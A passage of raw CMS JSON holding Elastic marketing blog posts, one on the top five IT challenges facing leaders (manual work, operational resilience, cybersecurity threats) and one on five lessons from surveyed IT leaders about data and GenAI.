style='font-size: 12pt;'\u003eprioritize investment in data tools and technology\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e as a top solution. More specifically, you have everything to gain from \u003c/span\u003e\u003ca href=\"https://www.elastic.co/observability/tool-consolidation\"\u003e\u003cspan style='font-size: 12pt;'\u003econsolidating your tools\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and investing in ones that can democratize access to data from multiple environments across organizational silos.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"3. Too much time spent on manual work and analysis","_metadata":{"uid":"csda9d7ff280b3d50c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“If data cannot be processed and analyzed quickly, it can lead to delayed decision-making, affecting critical aspects like customer service, product development, and marketing strategies,” explains a technology company C-suite executive. Inefficiencies hinder productivity and even slow down innovation while IT departments bear the brunt of tool sprawl and data silos.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWithout the right easy-to-use tools and processes, teams often spend a lot of time on excessive manual work and analysis to get the output they need. Not only does this stifle efficiency and productivity, but it also often hinders innovation.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eYou hire the best people — why keep them stuck doing inefficient tasks instead of innovating? If teams had the right tools, they could save time on manual routine tasks and instead focus on more value-added activities that drive business growth. Repetition and inefficiencies can often lead to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/interactive/cybersecurity-analyst-burnout-quiz\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eburnout\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and can exacerbate valuable talent. Building solutions and tools that allow teams to quickly approach laborious tasks and integrate with existing workflows can lead to better employee satisfaction,\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003csup\u003e*\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e retention, and business efficiency. Using tools that do not support your teams can lead to a loss of productivity, reputation, and revenue.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSolution:\u003c/strong\u003e\u003cstrong\u003e\u003cbr bold=\"[object Object]\"/\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTaking a people, processes, and technology (PPT) approach to investing in technology and tools can help you build better workflows that prioritize automating repetitive tasks, ultimately leading to increased efficiency, cost savings, and a more agile, innovative organization. By analyzing and redesigning workflows, organizations can identify bottlenecks and inefficiencies, creating streamlined processes that are documented and standardized for consistency.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSelecting the right tools that integrate seamlessly with existing systems and leveraging advanced technologies like GenAI and machine learning further optimize automation capabilities. This approach not only improves accuracy and reduces costs but also enhances organizational agility and employee satisfaction, ultimately providing a competitive advantage in the market.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"4. Lack of operational resilience","_metadata":{"uid":"csdf275f59a3a93542"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOutages are a business's worst nightmare — especially considering the average cost of downtime can be as high as $9,000 a minute.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003csup\u003e*\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/operational-resilience\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOperational resilience\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e helps businesses weather disruptions by minimizing downtime and preventing potential crises. Resilient companies adapt faster to market changes and outperform competitors during and after a crisis.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003csup\u003e*\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e In other words, operational resilience is good for business.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSuccessful data management and practices are at the heart of operational resilience, yet establishing it is a challenge for many businesses. Without the proper tools, practices, and experts, business data is a burdensome anchor rather than a sail. As a result, organizations are vulnerable to frequent disruptions, delays, and downtime, which impact resilience, increase business risk, reduce productivity, and drive up costs.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSolution:\u003c/strong\u003e\u003cstrong\u003e\u003cbr bold=\"[object Object]\"/\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWithout the ability to proactively get ahead of disruptions and outages, organizations are locked in a reactive stance and forced to play catch-up. AI can put you ahead of the game with predictive resilience models. By analyzing trends in your data, it can spot potential issues before they occur. Putting out fires big and small ultimately affects end-user productivity and revenue from customer-facing services.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAchieving operational resilience begins with a robust data foundation rather than a disparate collection of fragmented tools and systems. By prioritizing data infrastructure, you can empower your teams with actionable, real-time insights to take on a proactive approach that drives business growth and ensures that your revenue-generating applications are up and running.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"5. Not able to effectively mitigate cybersecurity threats","_metadata":{"uid":"cs5353daa763534bd2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGenAI has many potential advantages, but it has also fostered the rise of a new generation of cyber threats. The use of GenAI in both official and unofficial capacities has also intensified and fueled these \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/cyber-threat-research\"\u003e\u003cspan style='font-size: 12pt;'\u003ecybersecurity threats\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Often understaffed in the security domain or underskilled in the face of rapidly evolving AI technologies, organizations see negative business impacts: reactive measures lead to high-risk exposure, financial loss, legal issues, reputational damage, and lost customer trust.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEffectively mitigating these cybersecurity threats requires specialized skills that are in high demand and very difficult to come by. Organizations must also update security monitoring practices to reach across data silos and offer security teams a 360° view into their systems and operations.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3f583fd508cadc0d"}}},{"quotes":{"quote_l10n":"Market is trending, technology is dynamic, and it gives rise to new-gen digital crimes. We want [to] be up to the mark per industry standards by equipping ourselves with the latest cybersecurity knowledge and implementations.","_metadata":{"uid":"cs6516caba71853163"},"quote_author_l10n":"C-suite executive, technology industry","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs92347fdcd431911c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSolution:\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eSo, while GenAI may be exacerbating the challenge of keeping up with new threats, it may also be the solution to mitigating them more effectively. More than half (59%) of leaders have already invested in \u003c/span\u003e\u003ca href=\"http://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eAI and ML-driven security automation technologies\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and 96% believe that using GenAI security assistants that can proactively detect and remediate network issues and threats will drive value to their organizations. Generative AI has the potential to help close the expertise gap in the security sector and fill security roles when applied to a robust data infrastructure.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUltimately, it all comes down to data. Leaders are dealing with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/\"\u003e\u003cspan style='font-size: 12pt;'\u003edata challenges\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — from sprawl and silos to a lack of adequate tools and an insufficient workforce — which compound observability, security, and resilience challenges. It’s no wonder then that C-suite executives and leaders are prioritizing GenAI solutions and data analytics tools as their top technology investments.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Take the data and AI assessment","_metadata":{"uid":"cs76ccb25e6aa2537b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLeaders across many organizations struggle with similar business and data challenges, all while looking to AI and GenAI for new opportunities. To identify areas of improvement and investment, reflecting on existing challenges and understanding your competitors is the best place to start to develop a strategic plan to stay competitive.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/interactive/data-and-ai-strategy-assessment\"\u003e\u003cspan style='font-size: 12pt;'\u003eSee how you stack up against your peers in AI investments, business challenges, and opportunities\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(37, 99, 235);font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs76a74120492272e6"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs503ef0b072aeb72b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cem\u003eOriginally published on October 8, 2024; Updated on December 12, 2024.\u003c/em\u003e\u003c/p\u003e"},{"title_l10n":"","_metadata":{"uid":"cs15423df415b4bf9e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e*\u003ca href=\"https://www.salesforce.com/blog/automation-trend-employee-experience/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003e89% Of Your Employees Could Benefit With This One Change\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e, Salesforce. 2022.\u003cbr /\u003e\u003c/span\u003e*\u003ca href=\"https://www.forbes.com/councils/forbestechcouncil/2024/04/10/the-true-cost-of-downtime-and-how-to-avoid-it/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eThe true cost of downtime (and how to avoid it)\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e, Forbes. 2024.\u003cbr /\u003e\u003c/span\u003e*\u003ca href=\"https://www.mckinsey.com/capabilities/risk-and-resilience/our-insights/resilience-for-sustainable-inclusive-growth\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 10pt;\"\u003eResilience for sustainable, inclusive growth\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 10pt;\"\u003e, McKinsey. 2022.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1ae42d25568a3208"}}}],"publish_date":"2024-12-12","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltdf59d18fa27d1692","ACL":{},"created_at":"2023-11-06T21:34:55.381Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"tool-consolidation","label_l10n":"Tool consolidation","tags":[],"title":"Tool consolidation","updated_at":"2023-11-06T21:34:55.381Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.747Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt4b8871540ff04df3","_version":1,"title":"161778 - 2 Blog header images_ IT Wrapped Report blogs 2.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-10-08T01:34:02.761Z","updated_at":"2024-10-08T01:34:02.761Z","content_type":"image/jpeg","file_size":"161652","filename":"161778_-_2_Blog_header_images_IT_Wrapped_Report_blogs_2.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-12T18:54:58.555Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4b8871540ff04df3/67048c0a5ff78d32dc8f0977/161778_-_2_Blog_header_images_IT_Wrapped_Report_blogs_2.jpg"},"title":"Top 5 IT challenges leaders are facing (and solutions to them)","title_l10n":"Top 5 IT challenges leaders are facing (and solutions to them)","updated_at":"2025-02-06T02:52:25.146Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/top-5-it-challenges-leaders-face-solutions","publish_details":{"time":"2025-02-06T02:52:30.933Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blte31dda2d51acc398","_version":9,"locale":"en-us","ACL":{},"abstract_l10n":"The secret to sustainable business growth? Data-driven insights. We interviewed and surveyed 1,005 IT leaders to discover what it takes to continue to grow your business with the help of your data and AI strategy. ","author":["blt14f762eec103604e","blt2914a3798eec2d59"],"category":["bltc17514bfdbc519df"],"created_at":"2024-09-30T13:16:47.984Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc9d5a64db7f665ed"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMaintaining a competitive edge can feel like a constant struggle as IT leaders race to adopt artificial intelligence (AI) to solve their IT challenges and drive innovation. But with the right tools, processes, and strategies, your organization can make the most of your proprietary data and harness the power of data-driven insights and AI to accelerate your business forward.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLeveraging your data in real time at scale is key to driving business value. More than 80% of C-suite executives expect data and AI to improve productivity and revenue. But to get to those results, it is critical to invest in a strong data foundation that can manage exponentially growing data volumes and uncover insights on your customers, operations, products, and services.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAI and generative AI (GenAI) can be used to optimize your systems and experiences. But before reaching these next-generation technologies, you should focus on getting access to relevant real-time insights at scale to guide your decision-making.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBut don’t just take it from us. Here are \u003c/span\u003e\u003ca href=\"http://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003efive lessons from 1,005 IT leaders\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e on how to unlock business growth with data and AI.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Lesson 1: Prioritize data-driven insights to accelerate business innovation","_metadata":{"uid":"cs286709b0b73862db"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eYour business runs on vast amounts of data. Everything in your operational environment continuously consumes and creates data from various sources: your applications, systems, services, and infrastructure. A data-driven approach is crucial for solving key business challenges and driving innovation — you can’t create exceptional customer experiences without understanding what your customers expect and want.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTo outmaneuver competitors and truly accelerate business innovation, you need to understand your current state of operations and promising growth opportunities. This is achieved by not only collecting and analyzing your relevant data but also deriving data-driven insights from it. These \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-turn-data-into-actionable-insights\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eactionable insights\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e help you improve resilience, increase your productivity, and ultimately accelerate innovation.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor example, you might get insight into customers abandoning their carts when they add a certain product. You can look into this and discover that the product listing had a bug and wasn’t allowing people to checkout.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eUnless you analyze it, all this useful information can get lost in storage, often leading to lost revenue opportunities or high operational costs. Creating a culture of data-driven, strategic decision-making needs to happen across the organization from every step of the process to uncover and solve existing business challenges and uncover value-creation opportunities that enable new revenue streams, enhance competitive advantage, and boost business growth. “Problems with \u003c/span\u003e\u003ca href=\"http://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ereal-time, scalable data utilization\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e impact business efficiency,” explains one technology decision-maker.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAdopting a strategy to prioritize a culture of using data-driven insights across your organization lays the foundation for innovation.\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Transforming your data into actionable insights starts with reducing data silos and enabling data accessibility, which can lead to faster decision-making, increased productivity, and the edge to outperform your competitors.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Lesson 2: Make sure you’re satisfied with your data insights","_metadata":{"uid":"cs6b9e29189d8e8d32"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow, you may be getting insights from your data, but are you satisfied with those insights? Three out of five C-suite executives and decision-makers are \u003c/span\u003e\u003ca href=\"http://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eunsatisfied with the data insights available to them\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Delivering meaningful and actionable data analytics comes down to defining clear objectives and managing data volume. Too much data results in noise, but not enough data stretched across multiple silos makes \u003c/span\u003e\u003ca href=\"https://www.fastcompany.com/91140608/the-next-phase-of-generative-ai-presents-a-golden-opportunity-for-businesses\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003econnecting the dots\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e very difficult.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfca5e94b76e4b148"}}},{"quotes":{"quote_l10n":"If data cannot be processed and analyzed quickly, it can lead to delayed decision-making, affecting critical aspects like customer service, product development, and marketing strategies.","_metadata":{"uid":"cs71d7bd83aa99f6b0"},"quote_author_l10n":"C-suite tech executive","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7e2f32c45222a64e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSo, how do you make sure you’re satisfied with your data insights? Identify the areas of your organization where you would most benefit from having accurate, real-time insights. Focus first on solving any \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eunderlying data challenges\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e in these impact-making areas and then work on refining those insights with accuracy top of mind. The more accurate these insights are, the more helpful and valuable in a business context. \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eImproved data insights can enhance decision-making, reduce risks, and increase operational efficiency.\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Lesson 3: Take time to evaluate and enhance your data maturity","_metadata":{"uid":"csb7b14893672a150a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe hard truth is that 78% of C-suite leaders and IT decision-makers believe their organization is \u003c/span\u003e\u003ca href=\"http://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003emore advanced in data analytics and intelligence than their peers\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. In reality, there is a significant disconnect between the perceived and actual data maturity levels across organizations. Data maturity — how well an organization leverages data for business — can be broken down into \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/where-are-you-on-your-data-maturity-journey\"\u003e\u003cspan style='font-size: 12pt;'\u003efour stages\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e: capture, analyze, automate, and transform. By identifying where your organization stands in the data maturity framework, you can uncover the best ways to use your data and technology to achieve your business goals.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2e82e6195a88d716"}}},{"quotes":{"quote_l10n":"We have data silos where different parts of the organization store data separately. This makes it hard to access and use data across departments.","_metadata":{"uid":"csec6ab1da9fcaacfb"},"quote_author_l10n":"Technology decision-maker in the public sector","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6b8b417559b7289a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIf you’re facing a similar challenge, it’s likely your organization hasn’t reached the more advanced stages of the data maturity journey. And even if you have, the journey doesn’t end. It’s a constant quest to continuously innovate and operationalize with the power of your data. To begin your organization’s data maturity assessment, look to your data challenges: Are you dealing with excessive or insufficient volumes of data? Is it difficult to find information within your organization? Is your data taxonomy working for you?\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBy \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/advance-data-maturity-journey\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eevaluating and advancing through your data maturity\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e journey, you’re building a robust data foundation that aligns with your business goals.\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Aligning to business objectives is crucial to enable more informed and strategic decision-making and \u003ca href=\"https://www.elastic.co/lp/whats-possible-with-genai\" target=\"_self\"\u003euncover opportunities to use AI\u003c/a\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Lesson 4: Understand that GenAI comes second to good data practices","_metadata":{"uid":"csfdaf57cb496f3185"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/generative-ai/\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenAI\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e comes with the potential to unlock new automation capabilities, enhance your \u003c/span\u003e\u003ca href=\"https://www.elastic.co/enterprise-search/search-applications\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003esearch applications\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, improve your \u003c/span\u003e\u003ca href=\"https://www.elastic.co/enterprise-search/customer-support\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecustomer experience\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, and give your employees time back to focus on strategic activities. It’s impressive and impossible to ignore — so, you’re probably under pressure from your board or leadership to implement new generative AI applications as soon as possible.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBut getting value out of GenAI starts with quality data practices. Your GenAI outputs are dependent upon the data you input. Quality in, quality out. Without the right data and without robust data practices, GenAI won’t help you move the needle, and you won’t see the benefits. The opposite is also true. With rich data inputs and streamlined organizational processes, you’ll glean equally rich insights.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eObtaining quality data begins with making use of your data — across environments, no matter the type of data (\u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/structured-data\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003estructured\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/unstructured-data\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eunstructured\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/structured-data#difference-between-structured-semistructured-and-unstructured-data\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003esemi-structured\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e). Building on a foundation of solid data practices, look for a solution that can process all your types of data from across your distributed architecture. Remember: \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003ewith better data, you will get better AI outputs\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Lesson 5: Embrace GenAI for a competitive advantage","_metadata":{"uid":"cs3f301e348cc16286"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e“AI is the future. Without it, we are dinosaurs. GenAI will allow our company to make smarter and more efficient decisions without having to sacrifice anything. GenAI is smart, constantly learning and evolving, and it can tell us what we are missing, where to look, and what to do,” says a technology decision-maker in the manufacturing industry. Recent developments in GenAI have added a whole new wave of dizzying GenAI-powered possibilities, and those who are able to embrace it will gain a host of advantages.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOrganizations worldwide feel it: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/portfolio/report/5-insights-csuite-leaders-data-ai\"\u003e\u003cspan style='font-size: 12pt;'\u003e93% of C-suite executives plan to invest or have already invested in\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e GenAI to improve productivity, operational resilience, customer experience and more.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEarly (relatively speaking) adoption of GenAI can position your business ahead of competitors by creating new opportunities and driving innovation. \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eTo stay ahead of the adoption curve you first must have good data ready to go. Then, identify a high-impact use case that can benefit from the value of a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/open-source-llms-guide\"\u003e\u003cspan style='font-size: 12pt;'\u003elarge language model (LLM)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGetting the best results securely requires feeding your proprietary data to a generative AI algorithm using \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/retrieval-augmented-generation\"\u003e\u003cspan style='font-size: 12pt;'\u003eretrieval augmented generation (RAG\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e). This technique contextualizes the output of your organization, resulting in more accurate and relevant results.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Key 